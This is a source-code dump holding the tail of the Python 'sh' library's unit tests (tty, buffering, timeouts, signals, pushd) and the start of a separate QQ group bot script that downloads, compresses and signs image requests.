out = tr(tr("[:lower:]", "[:upper:]", _in=data), "[:upper:]", "[:lower:]")
self.assertTrue(out == data)
def test_tty_input(self):
py = create_tmp_test("""
import sys
import os
if os.isatty(sys.stdin.fileno()):
sys.stdout.write("password?\\n")
sys.stdout.flush()
pw = sys.stdin.readline().strip()
sys.stdout.write("%s\\n" % ("*" * len(pw)))
sys.stdout.flush()
else:
sys.stdout.write("no tty attached!\\n")
sys.stdout.flush()
""")
test_pw = "test123"
expected_stars = "*" * len(test_pw)
d = {}
def password_enterer(line, stdin):
line = line.strip()
if not line:
return
if line == "password?":
stdin.put(test_pw + "\n")
elif line.startswith("*"):
d["stars"] = line
return True
pw_stars = python(py.name, _tty_in=True, _out=password_enterer)
pw_stars.wait()
self.assertEqual(d["stars"], expected_stars)
response = python(py.name)
self.assertEqual(response, "no tty attached!\n")
def test_tty_output(self):
py = create_tmp_test("""
import sys
import os
if os.isatty(sys.stdout.fileno()):
sys.stdout.write("tty attached")
sys.stdout.flush()
else:
sys.stdout.write("no tty attached")
sys.stdout.flush()
""")
out = python(py.name, _tty_out=True)
self.assertEqual(out, "tty attached")
out = python(py.name, _tty_out=False)
self.assertEqual(out, "no tty attached")
def test_stringio_output(self):
from sh import echo
out = StringIO()
echo("-n", "testing 123", _out=out)
self.assertEqual(out.getvalue(), "testing 123")
out = cStringIO()
echo("-n", "testing 123", _out=out)
self.assertEqual(out.getvalue().decode(), "testing 123")
out = ioStringIO()
echo("-n", "testing 123", _out=out)
self.assertEqual(out.getvalue(), "testing 123")
out = iocStringIO()
echo("-n", "testing 123", _out=out)
self.assertEqual(out.getvalue().decode(), "testing 123")
def test_stringio_input(self):
from sh import cat
input = StringIO()
input.write("herpderp")
input.seek(0)
out = cat(_in=input)
self.assertEqual(out, "herpderp")
def test_internal_bufsize(self):
from sh import cat
output = cat(_in="a" * 1000, _internal_bufsize=100, _out_bufsize=0)
self.assertEqual(len(output), 100)
output = cat(_in="a" * 1000, _internal_bufsize=50, _out_bufsize=2)
self.assertEqual(len(output), 100)
def test_change_stdout_buffering(self):
py = create_tmp_test("""
import sys
import os
# this proves that we won't get the output into our callback until we send
# a newline
sys.stdout.write("switch ")
sys.stdout.flush()
sys.stdout.write("buffering\\n")
sys.stdout.flush()
sys.stdin.read(1)
sys.stdout.write("unbuffered")
sys.stdout.flush()
# this is to keep the output from being flushed by the process ending, which
# would ruin our test. we want to make sure we get the string "unbuffered"
# before the process ends, without writing a newline
sys.stdin.read(1)
""")
d = {
"newline_buffer_success": False,
"unbuffered_success": False,
}
def interact(line, stdin, process):
line = line.strip()
if not line:
return
if line == "switch buffering":
d["newline_buffer_success"] = True
process.change_out_bufsize(0)
stdin.put("a")
elif line == "unbuffered":
stdin.put("b")
d["unbuffered_success"] = True
return True
# start with line buffered stdout
pw_stars = python("-u", py.name, _out=interact, _out_bufsize=1)
pw_stars.wait()
self.assertTrue(d["newline_buffer_success"])
self.assertTrue(d["unbuffered_success"])
def test_callable_interact(self):
py = create_tmp_test("""
import sys
sys.stdout.write("line1")
""")
class Callable(object):
def __init__(self):
self.line = None
def __call__(self, line):
self.line = line
cb = Callable()
python(py.name, _out=cb)
self.assertEqual(cb.line, "line1")
def test_encoding(self):
return self.skipTest("what's the best way to test a different '_encoding' special keyword argument?")
def test_timeout(self):
import sh
from time import time
sleep_for = 3
timeout = 1
started = time()
try:
sh.sleep(sleep_for, _timeout=timeout).wait()
except sh.TimeoutException as e:
self.assertEqual(e.full_cmd, '/bin/sleep 3')
else:
self.fail("no timeout exception")
elapsed = time() - started
self.assertLess(abs(elapsed - timeout), 0.5)
def test_timeout_overstep(self):
started = time.time()
sh.sleep(1, _timeout=5)
elapsed = time.time() - started
self.assertLess(abs(elapsed - 1), 0.5)
def test_timeout_wait(self):
p = sh.sleep(3, _bg=True)
self.assertRaises(sh.TimeoutException, p.wait, timeout=1)
def test_timeout_wait_overstep(self):
p = sh.sleep(1, _bg=True)
p.wait(timeout=5)
def test_timeout_wait_negative(self):
p = sh.sleep(3, _bg=True)
self.assertRaises(RuntimeError, p.wait, timeout=-3)
def test_binary_pipe(self):
binary = b'\xec;\xedr\xdbF'
py1 = create_tmp_test("""
import sys
import os
sys.stdout = os.fdopen(sys.stdout.fileno(), "wb", 0)
sys.stdout.write(b'\\xec;\\xedr\\xdbF')
""")
py2 = create_tmp_test("""
import sys
import os
sys.stdin = os.fdopen(sys.stdin.fileno(), "rb", 0)
sys.stdout = os.fdopen(sys.stdout.fileno(), "wb", 0)
sys.stdout.write(sys.stdin.read())
""")
out = python(python(py1.name), py2.name)
self.assertEqual(out.stdout, binary)
# designed to trigger the "... (%d more, please see e.stdout)" output
# of the ErrorReturnCode class
def test_failure_with_large_output(self):
from sh import ErrorReturnCode_1
py = create_tmp_test("""
print("andrewmoffat" * 1000)
exit(1)
""")
self.assertRaises(ErrorReturnCode_1, python, py.name)
# designed to check if the ErrorReturnCode constructor does not raise
# an UnicodeDecodeError
def test_non_ascii_error(self):
from sh import ls, ErrorReturnCode
test = "/á"
# coerce to unicode
if IS_PY3:
pass
else:
test = test.decode("utf8")
self.assertRaises(ErrorReturnCode, ls, test)
def test_no_out(self):
py = create_tmp_test("""
import sys
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
p = python(py.name, _no_out=True)
self.assertEqual(p.stdout, b"")
self.assertEqual(p.stderr, b"stderr")
self.assertTrue(p.process._pipe_queue.empty())
def callback(line): pass
p = python(py.name, _out=callback)
self.assertEqual(p.stdout, b"")
self.assertEqual(p.stderr, b"stderr")
self.assertTrue(p.process._pipe_queue.empty())
p = python(py.name)
self.assertEqual(p.stdout, b"stdout")
self.assertEqual(p.stderr, b"stderr")
self.assertFalse(p.process._pipe_queue.empty())
def test_tty_stdin(self):
py = create_tmp_test("""
import sys
sys.stdout.write(sys.stdin.read())
sys.stdout.flush()
""")
out = python(py.name, _in="test\n", _tty_in=True)
self.assertEqual("test\n", out)
def test_no_err(self):
py = create_tmp_test("""
import sys
sys.stdout.write("stdout")
sys.stderr.write("stderr")
""")
p = python(py.name, _no_err=True)
self.assertEqual(p.stderr, b"")
self.assertEqual(p.stdout, b"stdout")
self.assertFalse(p.process._pipe_queue.empty())
def callback(line): pass
p = python(py.name, _err=callback)
self.assertEqual(p.stderr, b"")
self.assertEqual(p.stdout, b"stdout")
self.assertFalse(p.process._pipe_queue.empty())
p = python(py.name)
self.assertEqual(p.stderr, b"stderr")
self.assertEqual(p.stdout, b"stdout")
self.assertFalse(p.process._pipe_queue.empty())
def test_no_pipe(self):
from sh import ls
# calling a command regular should fill up the pipe_queue
p = ls()
self.assertFalse(p.process._pipe_queue.empty())
# calling a command with a callback should not
def callback(line): pass
p = ls(_out=callback)
self.assertTrue(p.process._pipe_queue.empty())
# calling a command regular with no_pipe also should not
p = ls(_no_pipe=True)
self.assertTrue(p.process._pipe_queue.empty())
def test_decode_error_handling(self):
from functools import partial
py = create_tmp_test("""
# -*- coding: utf8 -*-
import sys
import os
sys.stdout = os.fdopen(sys.stdout.fileno(), 'wb')
IS_PY3 = sys.version_info[0] == 3
if IS_PY3:
sys.stdout.write(bytes("te漢字st", "utf8"))
else:
sys.stdout.write("te漢字st")
""")
fn = partial(python, py.name, _encoding="ascii")
def s(fn): str(fn())
self.assertRaises(UnicodeDecodeError, s, fn)
p = python(py.name, _encoding="ascii", _decode_errors="ignore")
self.assertEqual(p, "test")
def test_signal_exception(self):
from sh import SignalException_15
def throw_terminate_signal():
py = create_tmp_test("""
import time
while True: time.sleep(1)
""")
to_kill = python(py.name, _bg=True)
to_kill.terminate()
to_kill.wait()
self.assertRaises(SignalException_15, throw_terminate_signal)
def test_signal_group(self):
child = create_tmp_test("""
import time
time.sleep(3)
""")
parent = create_tmp_test("""
import sys
import sh
python = sh.Command(sys.executable)
p = python("{child_file}", _bg=True, _new_session=False)
print(p.pid)
print(p.process.pgid)
p.wait()
""", child_file=child.name)
def launch():
p = python(parent.name, _bg=True, _iter=True)
child_pid = int(next(p).strip())
child_pgid = int(next(p).strip())
parent_pid = p.pid
parent_pgid = p.process.pgid
return p, child_pid, child_pgid, parent_pid, parent_pgid
def assert_alive(pid):
os.kill(pid, 0)
def assert_dead(pid):
self.assert_oserror(errno.ESRCH, os.kill, pid, 0)
# first let's prove that calling regular SIGKILL on the parent does
# nothing to the child, since the child was launched in the same process
# group (_new_session=False) and the parent is not a controlling process
p, child_pid, child_pgid, parent_pid, parent_pgid = launch()
assert_alive(parent_pid)
assert_alive(child_pid)
p.kill()
time.sleep(0.1)
assert_dead(parent_pid)
assert_alive(child_pid)
self.assertRaises(sh.SignalException_SIGKILL, p.wait)
assert_dead(child_pid)
# now let's prove that killing the process group kills both the parent
# and the child
p, child_pid, child_pgid, parent_pid, parent_pgid = launch()
assert_alive(parent_pid)
assert_alive(child_pid)
p.kill_group()
time.sleep(0.1)
assert_dead(parent_pid)
assert_dead(child_pid)
def test_pushd(self):
""" test basic pushd functionality """
old_wd1 = sh.pwd().strip()
old_wd2 = os.getcwd()
self.assertEqual(old_wd1, old_wd2)
self.assertNotEqual(old_wd1, tempdir)
with sh.pushd(tempdir):
new_wd1 = sh.pwd().strip()
new_wd2 = os.getcwd()
old_wd3 = sh.pwd().strip()
old_wd4 = os.getcwd()
self.assertEqual(old_wd3, old_wd4)
self.assertEqual(old_wd1, old_wd3)
self.assertEqual(new_wd1, tempdir)
self.assertEqual(new_wd2, tempdir)
def test_pushd_cd(self):
""" test that pushd works like pushd/popd with built-in cd correctly """
import sh
child = realpath(tempfile.mkdtemp())
try:
old_wd = os.getcwd()
with sh.pushd(tempdir):
self.assertEqual(tempdir, os.getcwd())
sh.cd(child)
self.assertEqual(child, os.getcwd())
self.assertEqual(old_wd, os.getcwd())
finally:
os.rmdir(child)
def test_cd_homedir(self):
orig = os.getcwd()
my_dir = os.path.realpath(os.path.expanduser("~")) # Use realpath because homedir may be a symlink
sh.cd()
self.assertNotEqual(orig, os.getcwd())
self.assertEqual(my_dir, os.getcwd())
def test_non_existant_cwd(self):
from sh import ls
# sanity check
non_exist_dir = join(tempdir, "aowjgoahewro")
self.assertFalse(exists(non_exist_dir))
self.assertRaises(sh.ForkException, ls, _cwd=non_exist_dir)
# https://github.com/amoffat/sh/issues/176
def test_baked_command_can_be_printed(self):
from sh import ls
ll = ls.bake("-l")
self.assertTrue(str(ll).endswith("/ls -l"))
# https://github.com/amoffat/sh/issues/185
def test_done_callback(self):
import time
class Callback(object):
def __init__(self):
self.called = False
self.exit_code = None
self.success = None
def __call__(self, p, success, exit_code):
self.called = True
self.exit_code = exit_code
self.success = success
py = create_tmp_test("""
from time import time, sleep
sleep(1)
print(time())
""")
callback = Callback()
p = python(py.name, _done=callback, _bg=True)
# do a little setup to prove that a command with a _done callback is run
# in the background
wait_start = time.time()
p.wait()
wait_elapsed = time.time() - wait_start
self.assertTrue(callback.called)
self.assertLess(abs(wait_elapsed - 1.0), 1.0)
self.assertEqual(callback.exit_code, 0)
self.assertTrue(callback.success)
def test_fork_exc(self):
from sh import ForkException
py = create_tmp_test("")
def fail():
raise RuntimeError("nooo")
self.assertRaises(ForkException, python, py.name, _preexec_fn=fail)
def test_new_session(self):
from threading import Event
py = create_tmp_test("""
import os
import time
pid = os.getpid()
pgid = os.getpgid(pid)
sid = os.getsid(pid)
stuff = [pid, pgid, sid]
print(",".join([str(el) for el in stuff]))
time.sleep(0.5)
""")
event = Event()
def handle(line, stdin, p):
pid, pgid, sid = line.strip().split(",")
pid = int(pid)
pgid = int(pgid)
sid = int(sid)
self.assertEqual(p.pid, pid)
self.assertEqual(pid, pgid)
self.assertEqual(p.pgid, pgid)
self.assertEqual(pgid, p.get_pgid())
self.assertEqual(pid, sid)
self.assertEqual(sid, pgid)
self.assertEqual(p.sid, sid)
self.assertEqual(sid, p.get_sid())
event.set()
# new session
p = python(py.name, _out=handle)
p.wait()
self.assertTrue(event.is_set())
event.clear()
def handle(line, stdin, p):
pid, pgid, sid = line.strip().split(",")
pid = int(pid)
pgid = int(pgid)
sid = int(sid)
test_pid = os.getpgid(os.getpid())
self.assertEqual(p.pid, pid)
self.assertNotEqual(test_pid, pgid)
self.assertEqual(p.pgid, pgid)
self.assertEqual(pgid, p.get_pgid())
self.assertNotEqual(pid, sid)
self.assertNotEqual(sid, pgid)
self.assertEqual(p.sid, sid)
self.assertEqual(sid, p.get_sid())
event.set()
# no new session
p = python(py.name, _out=handle, _new_session=False)
p.wait()
self.assertTrue(event.is_set())
def test_done_cb_exc(self):
from sh import ErrorReturnCode
class Callback(object):
def __init__(self):
self.called = False
self.success = None
def __call__(self, p, success, exit_code):
self.success = success
self.called = True
py = create_tmp_test("exit(1)")
callback = Callback()
try:
p = python(py.name, _done=callback, _bg=True)
p.wait()
except ErrorReturnCode:
self.assertTrue(callback.called)
self.assertFalse(callback.success)
else:
self.fail("command should've thrown an exception")
def test_callable_stdin(self):
py = create_tmp_test("""
import sys
sys.stdout.write(sys.stdin.read())
""")
def create_stdin():
state = {"count": 0}
def stdin():
count = state["count"]
if count == 4:
return None
state["count"] += 1
return str(count)
return stdin
out = python(py.name, _in=create_stdin())
self.assertEqual("0123", out)
def test_stdin_unbuffered_bufsize(self):
from time import sleep
# this tries to receive some known data and measures the time it takes
# to receive it. since we're flushing by newline, we should only be
# able to receive the data when a newline is fed in
py = create_tmp_test("""
import sys
from time import time
started = time()
data = sys.stdin.read(len("testing"))
waited = time() - started
sys.stdout.write(data + "\\n")
sys.stdout.write(str(waited) + "\\n")
started = time()
data = sys.stdin.read(len("done"))
waited = time() - started
sys.stdout.write(data + "\\n")
sys.stdout.write(str(waited) + "\\n")
sys.stdout.flush()
""")
def create_stdin():
yield "test"
sleep(1)
yield "ing"
sleep(1)
yield "done"
out = python(py.name, _in=create_stdin(), _in_bufsize=0)
word1, time1, word2, time2, _ = out.split("\n")
time1 = float(time1)
time2 = float(time2)
self.assertEqual(word1, "testing")
self.assertLess(abs(1 - time1), 0.5)
self.assertEqual(word2, "done")
self.assertLess(abs(1 - time2), 0.5)
def test_stdin_newline_bufsize(self):
from time import sleep
# this tries to receive some known data and measures the time it takes
# to receive it. since we're flushing by newline, we should only be
# able to receive the data when a newline is fed in
py = create_tmp_test("""
import sys
from time import time
started = time()
data = sys.stdin.read(len("testing\\n"))
waited = time() - started
sys.stdout.write(data)
sys.stdout.write(str(waited) + "\\n")
started = time()
data = sys.stdin.read(len("done\\n"))
waited = time() - started
sys.stdout.write(data)
sys.stdout.write(str(waited) + "\\n")
sys.stdout.flush()
""")
# we'll feed in text incrementally, sleeping strategically before
# sending a newline. we then measure the amount that we slept
# indirectly in the child process
def create_stdin():
yield "test"
sleep(1)
yield "ing\n"
sleep(1)
yield "done\n"
out = python(py.name, _in=create_stdin(), _in_bufsize=1)
word1, time1, word2, time2, _ = out.split("\n")
time1 = float(time1)
time2 = float(time2)
self.assertEqual(word1, "testing")
self.assertLess(abs(1 - time1), 0.5)
self.assertEqual(word2, "done")
self.assertLess(abs(1 - time2), 0.5)
def test_custom_timeout_signal(self):
from sh import TimeoutException
import signal
py = create_tmp_test("""
import time
time.sleep(3)
""")
try:
python(py.name, _timeout=1, _timeout_signal=signal.SIGQUIT)
except TimeoutException as e:
self.assertEqual(e.exit_code, signal.SIGQUIT)
else:
self.fail("we should have handled a TimeoutException")
def test_append_stdout(self):
py = create_tmp_test("""
import sys
num = sys.stdin.read()
sys.stdout.write(num)
""")
append_file = tempfile.NamedTemporaryFile(mode="a+b")
python(py.name, _in="1", _out=append_file)
python(py.name, _in="2", _out=append_file)
append_file.seek(0)
output = append_file.read()
self.assertEqual(b"12", output)
def test_shadowed_subcommand(self):
py = create_tmp_test("""
import sys
sys.stdout.write(sys.argv[1])
""")
out = python.bake(py.name).bake_()
self.assertEqual("bake", out)
def test_no_proc_no_attr(self):
py = create_tmp_test("")
with python(py.name) as p:
self.assertRaises(AttributeError, getattr, p, "exit_code")
def test_partially_applied_callback(self):
from functools import partial
py = create_tmp_test("""
for i in range(10):
print(i)
""")
output = []
def fn(foo, line):
output.append((foo, int(line.strip())))
log_line = partial(fn, "hello")
python(py.name, _out=log_line)
self.assertEqual(output, [("hello", i) for i in range(10)])
output = []
def fn(foo, line, stdin, proc):
output.append((foo, int(line.strip())))
log_line = partial(fn, "hello")
python(py.name, _out=log_line)
self.assertEqual(output, [("hello", i) for i in range(10)])
# https://github.com/amoffat/sh/issues/266
def test_grandchild_no_sighup(self):
import time
# child process that will write to a file if it receives a SIGHUP
child = create_tmp_test("""
import signal
import sys
import time
output_file = sys.argv[1]
with open(output_file, "w") as f:
def handle_sighup(signum, frame):
f.write("got signal %d" % signum)
sys.exit(signum)
signal.signal(signal.SIGHUP, handle_sighup)
time.sleep(2)
f.write("made it!\\n")
""")
# the parent that will terminate before the child writes to the output
# file, potentially causing a SIGHUP
parent = create_tmp_test("""
import os
import time
import sys
child_file = sys.argv[1]
output_file = sys.argv[2]
python_name = os.path.basename(sys.executable)
os.spawnlp(os.P_NOWAIT, python_name, python_name, child_file, output_file)
time.sleep(1) # give child a chance to set up
""")
output_file = tempfile.NamedTemporaryFile(delete=True)
python(parent.name, child.name, output_file.name)
time.sleep(3)
out = output_file.readlines()[0]
self.assertEqual(out, b"made it!\n")
def test_unchecked_producer_failure(self):
from sh import ErrorReturnCode_2
producer = create_tmp_test("""
import sys
for i in range(10):
print(i)
sys.exit(2)
""")
consumer = create_tmp_test("""
import sys
for line in sys.stdin:
pass
""")
direct_pipe = python(producer.name, _piped=True)
self.assertRaises(ErrorReturnCode_2, python, direct_pipe, consumer.name)
def test_unchecked_pipeline_failure(self):
# similar to test_unchecked_producer_failure, but this
# tests a multi-stage pipeline
from sh import ErrorReturnCode_2
producer = create_tmp_test("""
import sys
for i in range(10):
print(i)
sys.exit(2)
""")
middleman = create_tmp_test("""
import sys
for line in sys.stdin:
print("> " + line)
""")
consumer = create_tmp_test("""
import sys
for line in sys.stdin:
pass
""")
producer_normal_pipe = python(producer.name, _piped=True)
middleman_normal_pipe = python(producer_normal_pipe, middleman.name, _piped=True)
self.assertRaises(ErrorReturnCode_2, python, middleman_normal_pipe, consumer.name)
@skip_unless(HAS_MOCK, "requires unittest.mock")
class MockTests(BaseTests):
def test_patch_command_cls(self):
def fn():
cmd = sh.Command("afowejfow")
return cmd()
@unittest.mock.patch("sh.Command")
def test(Command):
Command().return_value = "some output"
return fn()
self.assertEqual(test(), "some output")
self.assertRaises(sh.CommandNotFound, fn)
def test_patch_command(self):
def fn():
return sh.afowejfow()
@unittest.mock.patch("sh.afowejfow", create=True)
def test(cmd):
cmd.return_value = "some output"
return fn()
self.assertEqual(test(), "some output")
self.assertRaises(sh.CommandNotFound, fn)
class MiscTests(BaseTests):
def test_pickling(self):
import pickle
py = create_tmp_test("""
import sys
sys.stdout.write("some output")
sys.stderr.write("some error")
exit(1)
""")
try:
python(py.name)
except sh.ErrorReturnCode as e:
restored = pickle.loads(pickle.dumps(e))
self.assertEqual(restored.stdout, b"some output")
self.assertEqual(restored.stderr, b"some error")
self.assertEqual(restored.exit_code, 1)
else:
self.fail("Didn't get an exception")
@requires_poller("poll")
def test_fd_over_1024(self):
py = create_tmp_test("""print("hi world")""")
with ulimit(resource.RLIMIT_NOFILE, 2048):
cutoff_fd = 1024
pipes = []
for i in xrange(cutoff_fd):
master, slave = os.pipe()
pipes.append((master, slave))
if slave >= cutoff_fd:
break
python(py.name)
for master, slave in pipes:
os.close(master)
os.close(slave)
def test_args_deprecated(self):
self.assertRaises(DeprecationWarning, sh.args, _env={})
def test_percent_doesnt_fail_logging(self):
""" test that a command name doesn't interfere with string formatting in
the internal loggers """
py = create_tmp_test("""
print("cool")
""")
python(py.name, "%")
python(py.name, "%%")
python(py.name, "%%%")
# TODO
# for some reason, i can't get a good stable baseline measured in this test
# on osx. so skip it for now if osx
@not_macos
@requires_progs("lsof")
def test_no_fd_leak(self):
import sh
import os
from itertools import product
# options whose combinations can possibly cause fd leaks
kwargs = {
"_tty_out": (True, False),
"_tty_in": (True, False),
"_err_to_out": (True, False),
}
def get_opts(possible_values):
all_opts = []
for opt, values in possible_values.items():
opt_collection = []
all_opts.append(opt_collection)
for val in values:
pair = (opt, val)
opt_collection.append(pair)
for combo in product(*all_opts):
opt_dict = {}
for key, val in combo:
opt_dict[key] = val
yield opt_dict
test_pid = os.getpid()
def get_num_fds():
lines = sh.lsof(p=test_pid).strip().split("\n")
def test(line):
line = line.upper()
return "CHR" in line or "PIPE" in line
lines = [line for line in lines if test(line)]
return len(lines) - 1
py = create_tmp_test("")
def test_command(**opts):
python(py.name, **opts)
# make sure our baseline is stable.. we can remove this
test_command()
baseline = get_num_fds()
for i in xrange(10):
test_command()
num_fds = get_num_fds()
self.assertEqual(baseline, num_fds)
for opts in get_opts(kwargs):
for i in xrange(2):
test_command(**opts)
num_fds = get_num_fds()
self.assertEqual(baseline, num_fds, (baseline, num_fds, opts))
def test_pushd_thread_safety(self):
import threading
import time
temp1 = realpath(tempfile.mkdtemp())
temp2 = realpath(tempfile.mkdtemp())
try:
results = [None, None]
def fn1():
with sh.pushd(temp1):
time.sleep(0.2)
results[0] = realpath(os.getcwd())
def fn2():
time.sleep(0.1)
with sh.pushd(temp2):
results[1] = realpath(os.getcwd())
time.sleep(0.3)
t1 = threading.Thread(name="t1", target=fn1)
t2 = threading.Thread(name="t2", target=fn2)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(results, [temp1, temp2])
finally:
os.rmdir(temp1)
os.rmdir(temp2)
def test_stdin_nohang(self):
py = create_tmp_test("""
print("hi")
""")
read, write = os.pipe()
stdin = os.fdopen(read, "r")
python(py.name, _in=stdin)
@requires_utf8
def test_unicode_path(self):
from sh import Command
python_name = os.path.basename(sys.executable)
py = create_tmp_test("""#!/usr/bin/env {0}
# -*- coding: utf8 -*-
print("字")
""".format(python_name), prefix="字", delete=False)
try:
py.close()
os.chmod(py.name, int(0o755))
cmd = Command(py.name)
# all of these should behave just fine
str(cmd)
repr(cmd)
unicode(cmd)
running = cmd()
str(running)
repr(running)
unicode(running)
str(running.process)
repr(running.process)
unicode(running.process)
finally:
os.unlink(py.name)
# https://github.com/amoffat/sh/issues/121
def test_wraps(self):
from sh import ls
wraps(ls)(lambda f: True)
def test_signal_exception_aliases(self):
""" proves that signal exceptions with numbers and names are equivalent
"""
import signal
import sh
sig_name = "SignalException_%d" % signal.SIGQUIT
sig = getattr(sh, sig_name)
from sh import SignalException_SIGQUIT
self.assertEqual(sig, SignalException_SIGQUIT)
def test_change_log_message(self):
py = create_tmp_test("""
print("cool")
""")
def log_msg(cmd, call_args, pid=None):
return "Hi! I ran something"
buf = StringIO()
handler = logging.StreamHandler(buf)
logger = logging.getLogger("sh")
logger.setLevel(logging.INFO)
try:
logger.addHandler(handler)
python(py.name, "meow", "bark", _log_msg=log_msg)
finally:
logger.removeHandler(handler)
loglines = buf.getvalue().split("\n")
self.assertTrue(loglines, "Log handler captured no messages?")
self.assertTrue(loglines[0].startswith("Hi! I ran something"))
# https://github.com/amoffat/sh/issues/273
def test_stop_iteration_doesnt_block(self):
""" proves that calling calling next() on a stopped iterator doesn't
hang. """
py = create_tmp_test("""
print("cool")
""")
p = python(py.name, _iter=True)
for i in range(100):
try:
next(p)
except StopIteration:
pass
# https://github.com/amoffat/sh/issues/195
def test_threaded_with_contexts(self):
import threading
import time
py = create_tmp_test("""
import sys
a = sys.argv
res = (a[1], a[3])
sys.stdout.write(repr(res))
""")
p1 = python.bake("-u", py.name, 1)
p2 = python.bake("-u", py.name, 2)
results = [None, None]
def f1():
with p1:
time.sleep(1)
results[0] = str(system_python("one"))
def f2():
with p2:
results[1] = str(system_python("two"))
t1 = threading.Thread(target=f1)
t1.start()
t2 = threading.Thread(target=f2)
t2.start()
t1.join()
t2.join()
correct = [
"('1', 'one')",
"('2', 'two')",
]
self.assertEqual(results, correct)
# https://github.com/amoffat/sh/pull/292
def test_eintr(self):
import signal
def handler(num, frame): pass
signal.signal(signal.SIGALRM, handler)
py = create_tmp_test("""
import time
time.sleep(2)
""")
p = python(py.name, _bg=True)
signal.alarm(1)
p.wait()
class StreamBuffererTests(unittest.TestCase):
def test_unbuffered(self):
from sh import _disable_whitelist # noqa: F401
from sh import StreamBufferer
b = StreamBufferer(0)
self.assertEqual(b.process(b"test"), [b"test"])
self.assertEqual(b.process(b"one"), [b"one"])
self.assertEqual(b.process(b""), [b""])
self.assertEqual(b.flush(), b"")
def test_newline_buffered(self):
from sh import _disable_whitelist # noqa: F401
from sh import StreamBufferer
b = StreamBufferer(1)
self.assertEqual(b.process(b"testing\none\ntwo"), [b"testing\n", b"one\n"])
self.assertEqual(b.process(b"\nthree\nfour"), [b"two\n", b"three\n"])
self.assertEqual(b.flush(), b"four")
def test_chunk_buffered(self):
from sh import _disable_whitelist # noqa: F401
from sh import StreamBufferer
b = StreamBufferer(10)
self.assertEqual(b.process(b"testing\none\ntwo"), [b"testing\non"])
self.assertEqual(b.process(b"\nthree\n"), [b"e\ntwo\nthre"])
self.assertEqual(b.flush(), b"e\n")
@requires_posix
class ExecutionContextTests(unittest.TestCase):
def test_basic(self):
import sh
out = StringIO()
_sh = sh(_out=out)
_sh.echo("-n", "TEST")
self.assertEqual("TEST", out.getvalue())
def test_no_interfere1(self):
import sh
out = StringIO()
_sh = sh(_out=out) # noqa: F841
from _sh import echo
echo("-n", "TEST")
self.assertEqual("TEST", out.getvalue())
# Emptying the StringIO
out.seek(0)
out.truncate(0)
sh.echo("-n", "KO")
self.assertEqual("", out.getvalue())
def test_no_interfere2(self):
import sh
out = StringIO()
from sh import echo
_sh = sh(_out=out) # noqa: F841
echo("-n", "TEST")
self.assertEqual("", out.getvalue())
def test_no_bad_name(self):
out = StringIO()
def fn():
import sh
sh = sh(_out=out)
self.assertRaises(RuntimeError, fn)
def test_set_in_parent_function(self):
import sh
out = StringIO()
_sh = sh(_out=out)
def nested1():
_sh.echo("-n", "TEST1")
def nested2():
import sh
sh.echo("-n", "TEST2")
nested1()
nested2()
self.assertEqual("TEST1", out.getvalue())
def test_reimport_no_interfere(self):
import sh
out = StringIO()
_sh = sh(_out=out)
import _sh # this reimport '_sh' from the eponymous local variable
_sh.echo("-n", "TEST")
self.assertEqual("TEST", out.getvalue())
def test_importer_detects_module_name(self):
import sh
_sh = sh()
omg = _sh # noqa: F841
from omg import cat # noqa: F401
def test_importer_only_works_with_sh(self):
def unallowed_import():
_os = os # noqa: F841
from _os import path # noqa: F401
self.assertRaises(ImportError, unallowed_import)
def test_reimport_from_cli(self):
# The REPL and CLI both need special handling to create an execution context that is safe to
# reimport
if IS_PY3:
cmdstr = '; '.join(('import sh, io, sys',
'out = io.StringIO()',
'_sh = sh(_out=out)',
'import _sh',
'_sh.echo("-n", "TEST")',
'sys.stderr.write(out.getvalue())',
))
else:
cmdstr = '; '.join(('import sh, StringIO, sys',
'out = StringIO.StringIO()',
'_sh = sh(_out=out)',
'import _sh',
'_sh.echo("-n", "TEST")',
'sys.stderr.write(out.getvalue())',
))
err = StringIO()
python('-c', cmdstr, _err=err)
self.assertEqual('TEST', err.getvalue())
if __name__ == "__main__":
root = logging.getLogger()
root.setLevel(logging.DEBUG)
root.addHandler(NullHandler())
test_kwargs = {}
if IS_PY2 and MINOR_VER != 6:
test_kwargs["failfast"] = True
test_kwargs["verbosity"] = 2
try:
# if we're running a specific test, we can let unittest framework figure out
# that test and run it itself. it will also handle setting the return code
# of the process if any tests error or fail
if len(sys.argv) > 1:
unittest.main(**test_kwargs)
# otherwise, it looks like we want to run all the tests
else:
suite = unittest.TestLoader().loadTestsFromModule(sys.modules[__name__])
test_kwargs["verbosity"] = 2
result = unittest.TextTestRunner(**test_kwargs).run(suite)
if not result.wasSuccessful():
exit(1)
finally:
if cov:
cov.stop()
cov.save()
|
main.py
|
import re
import base64
import time
import configparser
import requests
import hashlib
import threading
from urllib.parse import urlencode
from io import BytesIO
from PIL import Image
from queue import Queue
import cqhttp_helper as cq
from config import bot_host, bot_port, bot_img_file_dir, APP_ID, APP_KEY, qq_group, rules, compress_kb
bot = cq.CQHttp(api_root='http://127.0.0.1:5700/')
q = Queue()
@bot.on_message('group')
def handle_group_msg(context):
if context['sender']['role'] == 'member' and context['group_id'] in qq_group:
has_img, files = parse(context['message'])
if has_img:
for file in files:
if file.endswith('.gif'):
continue
q.put({
'user_id': context['user_id'],
'message_id': context['message_id'],
'group_id': context['group_id'],
'file': file
})
def parse(msg):
"""
解析是否有图片存在
:param msg: 回复
:return: 是否有, 图片位置和图片url
"""
reg = re.findall('\\[CQ:image,file=(.*?),url=.*?\\]', msg)
return len(reg) > 0, reg
def compress(file):
"""
判断图片大小是否大于1M, 否则压缩到700kb (base64会使数据变大)
:param file: 文件路径
:return: 是否为base64, (如果超, 则返回base64, 如何没有超, 返回url)
"""
conf = configparser.ConfigParser()
conf.read(f'{bot_img_file_dir}\\{file}.cqimg')
o_size = int(conf.get('image', 'size')) / 1024
md5 = conf.get('image', 'md5')
img_url = conf.get('image', 'url')
img_bin = requests.get(img_url).content
im = Image.open(BytesIO(img_bin))
while o_size > compress_kb:
width, height = im.size
im = im.resize((int(width * 0.5), int(height * 0.5)), Image.ANTIALIAS)
im.save(f'./tmp/{md5}.{file.split(".")[-1]}')
with open(f'./tmp/{md5}.{file.split(".")[-1]}', 'rb') as f:
img_bin = f.read()
o_size = len(img_bin) / 1024
im = Image.open(BytesIO(img_bin))
return base64.b64encode(img_bin).decode('utf-8'), md5
def sign(body: dict):
"""
sign计算
:param body:
:return:
"""
b = urlencode(sorted(body.items(), key=lambda value: value[0]))
b += '&app_key=' + APP_KEY
return str(hashlib.md5(b.encode()).hexdigest()).upper()
